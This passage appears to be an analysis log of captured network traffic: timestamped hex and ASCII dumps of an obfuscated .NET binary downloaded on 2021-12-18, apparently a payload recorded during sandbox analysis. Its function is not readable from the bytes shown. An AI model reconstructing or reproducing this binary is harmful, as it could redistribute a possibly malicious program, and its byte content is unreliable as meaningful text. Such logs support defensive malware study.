                                                                                                                                  Data Ascii: 8I # %X ?8 (:& {8 p /X3 8*(@s (9& ,8 ` X3 ."8z(@! 8i%(& 8K'lX% _d 8.I
                                                                                                                                  2021-12-18 14:32:00 UTC29INData Raw: ff ff fe 0c 10 00 20 08 00 00 00 fe 0c 33 00 9c 20 35 00 00 00 28 1e 01 00 06 3a a6 ab ff ff 26 20 04 00 00 00 38 9b ab ff ff 11 74 11 72 19 58 11 51 19 91 9c 20 1b 00 00 00 28 1f 01 00 06 3a 81 ab ff ff 26 20 b1 01 00 00 38 76 ab ff ff fe 0c 49 00 20 06 00 00 00 fe 0c 35 00 9c 20 82 01 00 00 38 5e ab ff ff 11 21 28 0b 01 00 06 13 2f 20 51 01 00 00 38 4b ab ff ff 28 cd 00 00 06 20 42 00 00 00 38 3c ab ff ff fe 0c 10 00 20 11 00 00 00 fe 0c 33 00 9c 20 10 00 00 00 28 1f 01 00 06 39 1f ab ff ff 26 20 05 00 00 00 38 14 ab ff ff fe 0c 10 00 20 06 00 00 00 fe 0c 33 00 9c 20 67 01 00 00 28 1e 01 00 06 39 f7 aa ff ff 26 20 9e 02 00 00 38 ec aa ff ff 17 8d 17 00 00 01 16 1e 28 cb 00 00 06 17 28 cc 00 00 06 20 f6 00 00 00 38 cf aa ff ff 16 6a 13 2f 20 0c 00 00 00
                                                                                                                                  Data Ascii: 3 5(:& 8trXQ (:& 8vI 5 8^!(/ Q8K( B8< 3 (9& 8 3 g(9& 8(( 8j/
                                                                                                                                  2021-12-18 14:32:00 UTC30INData Raw: 68 a6 ff ff 20 ec 00 00 00 20 4e 00 00 00 59 fe 0e 33 00 20 ee 00 00 00 38 4f a6 ff ff 11 2f 73 6f 00 00 0a 28 d4 00 00 06 1f 40 12 46 28 b0 00 00 06 26 20 5d 02 00 00 fe 0e 22 00 38 27 a6 ff ff fe 0c 49 00 20 0e 00 00 00 20 cb 00 00 00 20 43 00 00 00 59 9c 20 3d 00 00 00 28 1f 01 00 06 3a 07 a6 ff ff 26 20 51 00 00 00 38 fc a5 ff ff 20 db 00 00 00 20 49 00 00 00 59 fe 0e 33 00 20 bd 00 00 00 28 1e 01 00 06 39 de a5 ff ff 26 20 d0 01 00 00 38 d3 a5 ff ff 11 2b 16 8f 17 00 00 01 e0 13 6b 20 28 00 00 00 38 be a5 ff ff 20 d6 00 00 00 20 47 00 00 00 59 fe 0e 33 00 20 37 01 00 00 38 a5 a5 ff ff fe 0c 10 00 20 1e 00 00 00 fe 0c 33 00 9c 20 50 02 00 00 38 8d a5 ff ff fe 0c 49 00 20 07 00 00 00 fe 0c 35 00 9c 20 2c 00 00 00 28 1e 01 00 06 3a 70 a5 ff ff 26 20 2c
                                                                                                                                  Data Ascii: h NY3 8O/so(@F(& ]"8'I CY =(:& Q8 IY3 (9& 8+k (8 GY3 78 3 P8I 5 ,(:p& ,
                                                                                                                                  2021-12-18 14:32:00 UTC32INData Raw: 58 9c 20 57 00 00 00 38 f7 a1 ff ff fe 0c 10 00 20 13 00 00 00 fe 0c 33 00 9c 20 f3 00 00 00 28 1f 01 00 06 3a da a1 ff ff 26 20 09 01 00 00 38 cf a1 ff ff fe 0c 10 00 20 15 00 00 00 20 83 00 00 00 20 5f 00 00 00 58 9c 20 73 01 00 00 28 1e 01 00 06 3a ab a1 ff ff 26 20 d7 00 00 00 38 a0 a1 ff ff 11 1c 11 3a 11 1c 11 3a 91 11 58 11 3a 91 61 d2 9c 20 4a 01 00 00 fe 0e 22 00 38 7d a1 ff ff fe 0c 10 00 20 1a 00 00 00 20 0a 00 00 00 20 09 00 00 00 58 9c 20 7a 00 00 00 38 62 a1 ff ff 20 e2 00 00 00 20 4b 00 00 00 59 fe 0e 33 00 20 7b 01 00 00 28 1f 01 00 06 3a 44 a1 ff ff 26 20 1f 02 00 00 38 39 a1 ff ff 11 74 11 13 1d 58 11 70 1d 91 9c 20 e7 01 00 00 38 24 a1 ff ff fe 0c 10 00 20 10 00 00 00 20 8c 00 00 00 20 2e 00 00 00 59 9c 20 88 00 00 00 28 1e 01 00 06 39
                                                                                                                                  Data Ascii: X W8 3 (:& 8 _X s(:& 8::X:a J"8} X z8b KY3 {(:D& 89tXp 8$ .Y (9
                                                                                                                                  2021-12-18 14:32:00 UTC33INData Raw: 01 00 00 38 a2 9c ff ff 12 3d 28 72 00 00 0a 28 fe 00 00 06 13 70 20 78 02 00 00 38 8a 9c ff ff 11 29 1a 1e 12 15 28 b0 00 00 06 26 20 31 02 00 00 38 74 9c ff ff 38 11 a7 ff ff 20 de 00 00 00 38 65 9c ff ff fe 0c 10 00 20 17 00 00 00 20 70 00 00 00 20 56 00 00 00 58 9c 20 d2 01 00 00 38 46 9c ff ff 11 5a 11 14 61 13 25 20 96 01 00 00 38 35 9c ff ff 11 03 11 01 28 ac 00 00 06 d0 2f 00 00 02 28 03 01 00 06 28 08 01 00 06 74 2f 00 00 02 28 09 01 00 06 13 21 20 a1 00 00 00 38 07 9c ff ff 11 56 16 1f 63 9c 20 e0 00 00 00 fe 0e 22 00 38 ef 9b ff ff 20 5e 00 00 00 20 24 00 00 00 58 fe 0e 33 00 20 ac 00 00 00 28 1e 01 00 06 3a d5 9b ff ff 26 20 6a 00 00 00 38 ca 9b ff ff 28 05 01 00 06 11 12 28 06 01 00 06 13 01 20 55 00 00 00 28 1f 01 00 06 3a ad 9b ff ff 26 20
                                                                                                                                  Data Ascii: 8=(r(p x8)(& 18t8 8e p VX 8FZa% 85(/((t/(! 8Vc "8 ^ $X3 (:& j8(( U(:&
                                                                                                                                  2021-12-18 14:32:00 UTC34INData Raw: 63 00 00 04 7e 63 00 00 04 02 03 04 05 6f 45 01 00 06 2a 13 30 07 00 5c 00 00 00 00 00 00 00 7e 53 00 00 04 3a 41 00 00 00 28 b3 00 00 06 72 c3 0f 00 70 28 62 00 00 0a 72 d1 0f 00 70 28 62 00 00 0a 72 e3 0f 00 70 28 82 00 00 0a 28 ac 00 00 06 d0 34 00 00 02 28 23 00 00 0a 28 81 00 00 0a 74 34 00 00 02 80 53 00 00 04 7e 53 00 00 04 02 03 04 05 0e 04 6f 4a 01 00 06 2a 13 30 06 00 50 00 00 00 00 00 00 00 7e 6d 00 00 04 3a 37 00 00 00 28 b3 00 00 06 72 a5 0f 00 70 28 62 00 00 0a 72 f1 0f 00 70 28 80 00 00 0a 28 ac 00 00 06 d0 35 00 00 02 28 23 00 00 0a 28 81 00 00 0a 74 35 00 00 02 80 6d 00 00 04 7e 6d 00 00 04 02 03 04 05 6f 4f 01 00 06 2a 13 30 05 00 4f 00 00 00 00 00 00 00 7e 6e 00 00 04 3a 37 00 00 00 28 b3 00 00 06 72 01 10 00 70 28 62 00 00 0a 72 0d 10
                                                                                                                                  Data Ascii: c~coE*0\~S:A(rp(brp(brp((4(#(t4S~SoJ*0P~m:7(rp(brp((5(#(t5m~moO*0O~n:7(rp(br
                                                                                                                                  2021-12-18 14:32:00 UTC36INData Raw: fe 09 02 00 28 6c 00 00 0a 2a 4e 00 fe 09 00 00 fe 09 01 00 fe 09 02 00 28 91 00 00 0a 2a 2e 00 fe 09 00 00 28 69 00 00 0a 2a 5e 00 fe 09 00 00 fe 09 01 00 fe 09 02 00 fe 09 03 00 28 6a 00 00 0a 2a 1e 00 28 a7 00 00 06 2a 1e 00 28 92 00 00 0a 2a 2a fe 09 00 00 6f 93 00 00 0a 2a 00 2a fe 09 00 00 6f 94 00 00 0a 2a 00 4e 00 fe 09 00 00 fe 09 01 00 fe 09 02 00 28 ad 00 00 06 2a 3e 00 fe 09 00 00 fe 09 01 00 28 95 00 00 0a 2a 1e 00 28 5d 01 00 06 2a 1e 00 28 65 00 00 0a 2a 3e 00 fe 09 00 00 fe 09 01 00 28 96 00 00 0a 2a 3e 00 fe 09 00 00 fe 09 01 00 28 97 00 00 0a 2a 2a fe 09 00 00 6f 98 00 00 0a 2a 00 2a fe 09 00 00 6f 99 00 00 0a 2a 00 2a fe 09 00 00 6f 9a 00 00 0a 2a 00 2a fe 09 00 00 6f 9b 00 00 0a 2a 00 2a fe 09 00 00 6f 9c 00 00 0a 2a 00 3e 00 fe 09 00
                                                                                                                                  Data Ascii: (l*N(*.(i*^(j*(*(**o**o*N(*>(*(]*(e*>(*>(**o**o**o**o**o*>
                                                                                                                                  2021-12-18 14:32:00 UTC37INData Raw: 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 0a 00 2a 00 1e 02 28 09 00 00 0a 2a 1b 30 06 00 d9 3a 00 00 1b 00 00 11 20 4c 01 00 00 fe 0e 18 00 38 00 00 00 00 fe 0c 18 00 45 91 01 00 00 05 0c 00 00 b2 05 00 00 4a 04 00 00 66 0d 00 00 32 2a 00 00 21 24 00 00 c7 14 00 00 14 19 00 00 a2 08 00 00 25 0b 00 00 f7 0f 00 00 8e 09 00 00 eb 1f 00 00 91 17 00 00 68 2c 00 00 37 1a 00 00 44 01 00 00 f8 23 00 00 0b 16 00 00 59 03 00 00 97 13 00 00 b1 23 00 00 19 05 00 00 19 2a 00 00 23 30 00 00 d7 03 00 00 94 06 00 00 54 31 00 00 95 1d 00 00 6c 02 00 00 3e 0b 00 00 1d 08 00 00 5e 08 00 00 d6 07 00 00 ae 0e 00 00 54 0a 00 00 ce 00 00 00 89 25 00
                                                                                                                                  Data Ascii: (*(*(*(*(*(*(**(*0: L8EJf2*!$%h,7D#Y#*#0T1l>^T%
                                                                                                                                  2021-12-18 14:32:00 UTC38INData Raw: 31 00 00 00 18 00 00 18 2c 00 00 6c 26 00 00 a1 11 00 00 b0 1a 00 00 88 2a 00 00 86 21 00 00 a3 2c 00 00 82 15 00 00 ce 30 00 00 81 19 00 00 c6 32 00 00 47 1e 00 00 13 20 00 00 de 26 00 00 f8 21 00 00 4d 0d 00 00 bf 2b 00 00 30 0f 00 00 3a 24 00 00 53 2b 00 00 fd 30 00 00 fa 06 00 00 1f 1c 00 00 33 12 00 00 af 0f 00 00 fe 0c 00 00 d6 18 00 00 30 27 00 00 55 1c 00 00 51 17 00 00 c0 02 00 00 63 2b 00 00 ae 18 00 00 e2 14 00 00 56 30 00 00 16 0d 00 00 d8 20 00 00 b9 1c 00 00 31 03 00 00 65 1d 00 00 d0 09 00 00 c2 10 00 00 36 10 00 00 fb 14 00 00 e3 28 00 00 c0 15 00 00 89 14 00 00 8d 1a 00 00 d5 22 00 00 3b 1f 00 00 d7 0e 00 00 39 17 00 00 7e 13 00 00 78 0b 00 00 2c 0a 00 00 8d 2e 00 00 55 29 00 00 f2 27 00 00 4b 26 00 00 cd 1c 00 00 1e 1e 00 00 41 00 00 00
                                                                                                                                  Data Ascii: 1,l&*!,02G &!M+0:$S+030'UQc+V0 1e6(";9~x,.U)'K&A
                                                                                                                                  2021-12-18 14:32:00 UTC40INData Raw: 00 00 00 20 33 00 00 00 20 28 00 00 00 58 9c 20 58 01 00 00 38 98 f5 ff ff 11 21 28 6e 01 00 06 28 6b 01 00 06 80 77 00 00 04 20 fd 00 00 00 28 73 01 00 06 3a 78 f5 ff ff 26 20 77 01 00 00 38 6d f5 ff ff fe 0c 2a 00 20 01 00 00 00 20 43 00 00 00 20 36 00 00 00 58 9c 20 89 00 00 00 38 4e f5 ff ff fe 0c 2a 00 20 02 00 00 00 fe 0c 0c 00 9c 20 07 01 00 00 fe 0e 18 00 38 2e f5 ff ff 38 b2 0e 00 00 20 8a 00 00 00 28 72 01 00 06 3a 1e f5 ff ff 26 20 0b 00 00 00 38 13 f5 ff ff fe 0c 1b 00 20 08 00 00 00 20 5e 00 00 00 20 61 00 00 00 58 9c 20 eb 00 00 00 38 f4 f4 ff ff fe 0c 1b 00 20 1c 00 00 00 20 fa 00 00 00 20 53 00 00 00 59 9c 20 6d 00 00 00 38 d5 f4 ff ff fe 0c 2a 00 20 03 00 00 00 20 b8 00 00 00 20 3d 00 00 00 59 9c 20 24 00 00 00 38 b6 f4 ff ff fe 0c 2a 00
                                                                                                                                  Data Ascii: 3 (X X8!(n(kw (s:x& w8m* C 6X 8N* 8.8 (r:& 8 ^ aX 8 SY m8* =Y $8*
                                                                                                                                  2021-12-18 14:32:00 UTC41INData Raw: 20 ac 00 00 00 20 40 00 00 00 59 9c 20 f9 00 00 00 38 42 f0 ff ff 20 43 00 00 00 20 53 00 00 00 58 fe 0e 06 00 20 91 00 00 00 38 29 f0 ff ff 20 50 00 00 00 20 69 00 00 00 58 fe 0e 0c 00 20 77 00 00 00 38 10 f0 ff ff 20 24 00 00 00 20 4d 00 00 00 58 fe 0e 0c 00 20 0e 00 00 00 28 73 01 00 06 3a f2 ef ff ff 26 20 13 00 00 00 38 e7 ef ff ff fe 0c 1b 00 20 03 00 00 00 20 93 00 00 00 20 31 00 00 00 59 9c 20 22 01 00 00 38 c8 ef ff ff 11 09 11 28 17 59 40 78 05 00 00 20 3b 01 00 00 38 b3 ef ff ff fe 0c 1b 00 20 12 00 00 00 fe 0c 06 00 9c 20 4b 00 00 00 28 72 01 00 06 39 96 ef ff ff 26 20 6d 01 00 00 38 8b ef ff ff 20 20 00 00 00 8d 17 00 00 01 fe 0e 1b 00 20 8c 00 00 00 28 73 01 00 06 39 6e ef ff ff 26 20 74 00 00 00 38 63 ef ff ff 20 a8 00 00 00 20 38 00 00 00
                                                                                                                                  Data Ascii: @Y 8B C SX 8) P iX w8 $ MX (s:& 8 1Y "8(Y@x ;8 K(r9& m8 (s9n& t8c 8
                                                                                                                                  2021-12-18 14:32:00 UTC42INData Raw: 58 fe 0e 0c 00 20 1e 01 00 00 28 73 01 00 06 3a eb ea ff ff 26 20 7c 01 00 00 38 e0 ea ff ff 16 8d 17 00 00 01 13 0e 20 61 00 00 00 38 ce ea ff ff fe 0c 1b 00 20 13 00 00 00 20 35 00 00 00 20 04 00 00 00 59 9c 20 2f 00 00 00 38 af ea ff ff fe 0c 1b 00 20 11 00 00 00 fe 0c 06 00 9c 20 f6 00 00 00 28 72 01 00 06 39 92 ea ff ff 26 20 34 01 00 00 38 87 ea ff ff 20 c8 00 00 00 20 42 00 00 00 59 fe 0e 06 00 20 3d 01 00 00 38 6e ea ff ff 20 fa 00 00 00 20 53 00 00 00 59 fe 0e 06 00 20 e3 00 00 00 28 72 01 00 06 3a 50 ea ff ff 26 20 d7 00 00 00 38 45 ea ff ff 11 0f 13 22 20 b6 00 00 00 38 37 ea ff ff fe 0c 1b 00 20 10 00 00 00 20 32 00 00 00 20 59 00 00 00 58 9c 20 df 00 00 00 28 72 01 00 06 3a 13 ea ff ff 26 20 49 00 00 00 38 08 ea ff ff 73 75 00 00 0a 13 21 20
                                                                                                                                  Data Ascii: X (s:& |8 a8 5 Y /8 (r9& 48 BY =8n SY (r:P& 8E" 87 2 YX (r:& I8su!
                                                                                                                                  2021-12-18 14:32:00 UTC44INData Raw: 00 58 9c 20 42 00 00 00 28 73 01 00 06 39 94 e5 ff ff 26 20 33 00 00 00 38 89 e5 ff ff 20 9c 00 00 00 20 34 00 00 00 59 fe 0e 06 00 20 0e 00 00 00 38 70 e5 ff ff 20 63 00 00 00 20 77 00 00 00 58 fe 0e 0c 00 20 dd 00 00 00 38 57 e5 ff ff 20 64 00 00 00 20 78 00 00 00 58 fe 0e 06 00 20 fa 00 00 00 28 73 01 00 06 39 39 e5 ff ff 26 20 9f 00 00 00 38 2e e5 ff ff fe 0c 1b 00 20 13 00 00 00 20 65 00 00 00 20 44 00 00 00 58 9c 20 03 00 00 00 38 0f e5 ff ff fe 0c 1b 00 20 01 00 00 00 20 6a 00 00 00 20 04 00 00 00 58 9c 20 f7 00 00 00 38 f0 e4 ff ff 11 00 11 26 11 26 8e 69 17 11 11 58 59 91 60 13 00 20 2b 00 00 00 38 d5 e4 ff ff 20 04 00 00 00 20 56 00 00 00 58 fe 0e 0c 00 20 8d 00 00 00 38 bc e4 ff ff 11 09 11 23 5d 13 04 20 16 01 00 00 28 72 01 00 06 39 a6 e4 ff
                                                                                                                                  Data Ascii: X B(s9& 38 4Y 8p c wX 8W d xX (s99& 8. e DX 8 j X 8&&iXY` +8 VX 8#] (r9
                                                                                                                                  2021-12-18 14:32:00 UTC45INData Raw: 0f 00 00 00 58 fe 0e 0c 00 20 01 01 00 00 fe 0e 18 00 38 32 e0 ff ff fe 0c 2a 00 20 07 00 00 00 20 fa 00 00 00 20 53 00 00 00 59 9c 20 22 00 00 00 38 17 e0 ff ff 20 b4 00 00 00 20 17 00 00 00 58 fe 0e 06 00 20 5b 01 00 00 38 fe df ff ff fe 0c 2a 00 20 07 00 00 00 20 98 00 00 00 20 43 00 00 00 59 9c 20 39 00 00 00 28 73 01 00 06 3a da df ff ff 26 20 3c 00 00 00 38 cf df ff ff fe 0c 2a 00 20 04 00 00 00 fe 0c 0c 00 9c 20 4c 00 00 00 38 b7 df ff ff fe 0c 1b 00 20 0f 00 00 00 fe 0c 06 00 9c 20 c2 00 00 00 38 9f df ff ff fe 0c 2a 00 20 08 00 00 00 20 b4 00 00 00 20 3c 00 00 00 59 9c 20 5a 01 00 00 38 80 df ff ff fe 0c 2a 00 20 0d 00 00 00 20 b5 00 00 00 20 3c 00 00 00 59 9c 20 0f 01 00 00 38 61 df ff ff fe 0c 1b 00 20 01 00 00 00 20 36 00 00 00 20 2c 00 00 00
                                                                                                                                  Data Ascii: X 82* SY "8 X [8* CY 9(s:& <8* L8 8* <Y Z8* <Y 8a 6 ,
                                                                                                                                  2021-12-18 14:32:00 UTC46INData Raw: 00 38 ee da ff ff 20 11 00 00 00 20 76 00 00 00 58 fe 0e 06 00 20 e1 00 00 00 28 72 01 00 06 3a d0 da ff ff 26 20 59 00 00 00 38 c5 da ff ff 11 15 11 15 28 67 01 00 06 28 69 01 00 06 69 28 6a 01 00 06 13 17 20 4d 01 00 00 28 73 01 00 06 3a a0 da ff ff 26 20 74 01 00 00 38 95 da ff ff 20 ee 00 00 00 20 4f 00 00 00 59 fe 0e 0c 00 20 5b 00 00 00 38 7c da ff ff fe 0c 1b 00 20 0b 00 00 00 20 2e 00 00 00 20 57 00 00 00 58 9c 20 40 01 00 00 38 5d da ff ff 11 28 17 58 13 28 20 5a 00 00 00 38 4d da ff ff 20 11 00 00 00 20 1e 00 00 00 58 fe 0e 06 00 20 36 01 00 00 38 34 da ff ff fe 0c 2a 00 20 0a 00 00 00 fe 0c 0c 00 9c 20 6d 00 00 00 28 72 01 00 06 39 17 da ff ff 26 20 2a 01 00 00 38 0c da ff ff fe 0c 2a 00 20 0c 00 00 00 20 3d 00 00 00 20 2b 00 00 00 58 9c 20 72
                                                                                                                                  Data Ascii: 8 vX (r:& Y8(g(ii(j M(s:& t8 OY [8| . WX @8](X( Z8M X 684* m(r9& *8* = +X r
                                                                                                                                  2021-12-18 14:32:00 UTC48INData Raw: 38 96 d5 ff ff 20 b4 00 00 00 20 7b 00 00 00 59 fe 0e 06 00 20 09 01 00 00 38 7d d5 ff ff 20 a1 00 00 00 20 35 00 00 00 59 fe 0e 06 00 20 a0 00 00 00 38 64 d5 ff ff fe 0c 1b 00 20 09 00 00 00 fe 0c 06 00 9c 20 79 00 00 00 38 4c d5 ff ff 20 1c 00 00 00 20 34 00 00 00 58 fe 0e 06 00 20 8e 00 00 00 38 33 d5 ff ff fe 0c 2a 00 20 09 00 00 00 fe 0c 0c 00 9c 20 72 01 00 00 38 1b d5 ff ff 11 16 1e 58 13 16 20 61 01 00 00 28 73 01 00 06 39 06 d5 ff ff 26 20 06 01 00 00 38 fb d4 ff ff fe 0c 1b 00 20 14 00 00 00 fe 0c 06 00 9c 20 ba 00 00 00 28 72 01 00 06 39 de d4 ff ff 26 20 bd 00 00 00 38 d3 d4 ff ff fe 0c 1b 00 20 0f 00 00 00 fe 0c 06 00 9c 20 50 01 00 00 38 bb d4 ff ff fe 0c 2a 00 20 0e 00 00 00 20 80 00 00 00 20 2a 00 00 00 59 9c 20 7a 01 00 00 fe 0e 18 00 38
                                                                                                                                  Data Ascii: 8 {Y 8} 5Y 8d y8L 4X 83* r8X a(s9& 8 (r9& 8 P8* *Y z8
                                                                                                                                  2021-12-18 14:32:00 UTC49INData Raw: 00 00 58 fe 0e 06 00 20 5e 01 00 00 38 31 d0 ff ff 20 c7 00 00 00 20 42 00 00 00 59 fe 0e 0c 00 20 b7 00 00 00 28 73 01 00 06 39 13 d0 ff ff 26 20 94 00 00 00 38 08 d0 ff ff fe 0c 1b 00 20 07 00 00 00 fe 0c 06 00 9c 20 64 00 00 00 38 f0 cf ff ff fe 0c 2a 00 20 0f 00 00 00 20 25 00 00 00 20 18 00 00 00 58 9c 20 4a 00 00 00 28 73 01 00 06 3a cc cf ff ff 26 20 8b 01 00 00 38 c1 cf ff ff fe 0c 1b 00 20 08 00 00 00 20 35 00 00 00 20 28 00 00 00 58 9c 20 1b 00 00 00 fe 0e 18 00 38 9a cf ff ff 20 d1 00 00 00 20 45 00 00 00 59 fe 0e 0c 00 20 2c 01 00 00 38 85 cf ff ff fe 0c 1b 00 20 0a 00 00 00 20 af 00 00 00 20 3a 00 00 00 59 9c 20 0d 00 00 00 38 66 cf ff ff fe 0c 2a 00 20 04 00 00 00 20 e0 00 00 00 20 4a 00 00 00 59 9c 20 f4 00 00 00 38 47 cf ff ff fe 0c 2a 00
                                                                                                                                  Data Ascii: X ^81 BY (s9& 8 d8* % X J(s:& 8 5 (X 8 EY ,8 :Y 8f* JY 8G*
                                                                                                                                  2021-12-18 14:32:00 UTC50INData Raw: 00 fe 0e 18 00 38 db ca ff ff fe 0c 2a 00 20 0e 00 00 00 fe 0c 0c 00 9c 20 d4 00 00 00 28 72 01 00 06 3a c2 ca ff ff 26 20 60 00 00 00 38 b7 ca ff ff 20 91 00 00 00 20 30 00 00 00 59 fe 0e 06 00 20 d0 00 00 00 38 9e ca ff ff fe 0c 1b 00 20 09 00 00 00 fe 0c 06 00 9c 20 68 00 00 00 38 86 ca ff ff fe 0c 2a 00 20 09 00 00 00 20 73 00 00 00 20 35 00 00 00 58 9c 20 96 00 00 00 28 72 01 00 06 3a 62 ca ff ff 26 20 50 00 00 00 38 57 ca ff ff fe 0c 2a 00 20 0d 00 00 00 20 8a 00 00 00 20 2e 00 00 00 59 9c 20 0f 00 00 00 fe 0e 18 00 38 30 ca ff ff fe 0c 1b 00 20 0f 00 00 00 fe 0c 06 00 9c 20 11 00 00 00 fe 0e 18 00 38 14 ca ff ff 16 13 09 20 30 00 00 00 28 72 01 00 06 3a 06 ca ff ff 26 20 09 00 00 00 38 fb c9 ff ff fe 0c 1b 00 20 09 00 00 00 20 1c 00 00 00 20 73 00
                                                                                                                                  Data Ascii: 8* (r:& `8 0Y 8 h8* s 5X (r:b& P8W* .Y 80 8 0(r:& 8 s
                                                                                                                                  2021-12-18 14:32:00 UTC52INData Raw: fe 0c 13 00 fe 0c 05 00 58 fe 0e 13 00 fe 0c 13 00 fe 0c 13 00 1f 0d 64 61 fe 0e 13 00 fe 0c 13 00 fe 0c 08 00 58 fe 0e 13 00 fe 0c 25 00 1b 62 fe 0c 25 00 58 fe 0c 25 00 61 fe 0c 13 00 58 fe 0e 13 00 fe 0c 13 00 76 6c 6d 58 13 1e 20 25 00 00 00 38 39 c5 ff ff 00 00 00 01 10 00 00 02 00 43 14 3a 7d 14 59 00 00 00 00 13 30 04 00 5c 00 00 00 00 00 00 00 02 d0 3a 00 00 02 28 23 00 00 0a 6f 24 00 00 0a 28 cb 00 00 0a 39 3b 00 00 00 7e 78 00 00 04 3a 05 00 00 00 28 5f 01 00 06 73 cc 00 00 0a 25 02 6f cd 00 00 0a 6f ce 00 00 0a 25 7e 77 00 00 04 74 36 00 00 01 6f cd 00 00 0a 6f ce 00 00 0a 6f cf 00 00 0a 2a 02 6f cd 00 00 0a 2a 13 30 03 00 4d 00 00 00 1c 00 00 11 7e 78 00 00 04 3a 05 00 00 00 28 5f 01 00 06 03 6f d0 00 00 0a 0a 16 0b 38 21 00 00 00 7e 76 00 00
                                                                                                                                  Data Ascii: XdaX%b%X%aXvlmX %89C:}Y0\:(#o$(9;~x:(_s%oo%~wt6ooo*o*0M~x:(_o8!~v
                                                                                                                                  2021-12-18 14:32:00 UTC53INData Raw: 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: ********0*0*0*0*0*0*0*0*0*0*0*0
                                                                                                                                  2021-12-18 14:32:00 UTC54INData Raw: 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14
                                                                                                                                  Data Ascii: *0*0*0*0*0*0*0*0*0*0*0*0*0**0*0
                                                                                                                                  2021-12-18 14:32:00 UTC58INData Raw: 00 0b 00 53 5e 00 13 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 17 2a 01 10 00 00 02 00 06 00 49 4f 00 13 00 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 01 1c 00 00 00 00 5c 00 16 72 00 0b 0a 00 00 01 02 00 51 00 55 a6 00 13 00 00 00 00 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 34 00 00 02 00 00 00 f4 02 00 00 f7 00 00 00 eb 03 00 00 13 00 00 00 00 00 00 00 00 00 00 00 45 01 00 00 12 00 00 00 57 01 00 00 36 03 00 00 0f 00 00 01 03 30 08 00 04 00 00 00 00 00 00 00 00 00 00 2a 41 1c 00 00 02 00 00 00 06 00 00 00
                                                                                                                                  Data Ascii: S^0*IO**(*(*(*(*(*0*0*\rQU0*A4EW60*A
                                                                                                                                  2021-12-18 14:32:00 UTC63INData Raw: 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f ac 05 00 06 2a 00 42 28 a9 00 00 06 d0 b2 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f b0 05 00 06 2a 00 42 28 a9 00 00 06 d0 b3 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f b4 05 00 06 2a 00 42 28 a9 00 00 06 d0 b4 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f b8 05 00 06 2a 00 42 28 a9 00 00 06 d0 b5 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f bc 05 00 06 2a 00 42 28 a9 00 00 06 d0 b6 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f c0 05 00 06 2a 00 42 28 a9 00 00 06 d0 b7 00 00 02 28 a0 00 00 06 2a 00 00 00 3a 0e 03 0e 00 0e 01 0e 02 6f c4 05 00 06 2a 00 42 28 a9 00 00 06 d0 b8 00 00 02 28 a0 00 00 06 2a 00 00 00 3a 0e 03 0e 00 0e 01 0e 02 6f c8 05 00 06 2a 00 42
                                                                                                                                  Data Ascii: (**o*B((**o*B((**o*B((**o*B((**o*B((**o*B((*:o*B((*:o*B
